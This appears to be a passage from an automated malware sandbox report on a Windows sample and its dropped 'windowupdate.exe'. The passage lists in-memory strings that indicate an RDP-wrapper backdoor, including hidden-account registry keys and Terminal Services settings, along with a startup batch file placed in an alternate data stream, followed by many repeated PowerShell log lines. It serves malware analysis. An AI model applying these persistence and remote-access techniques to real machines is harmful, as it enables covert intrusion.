            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Creates files in alternative data streams (ADS)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
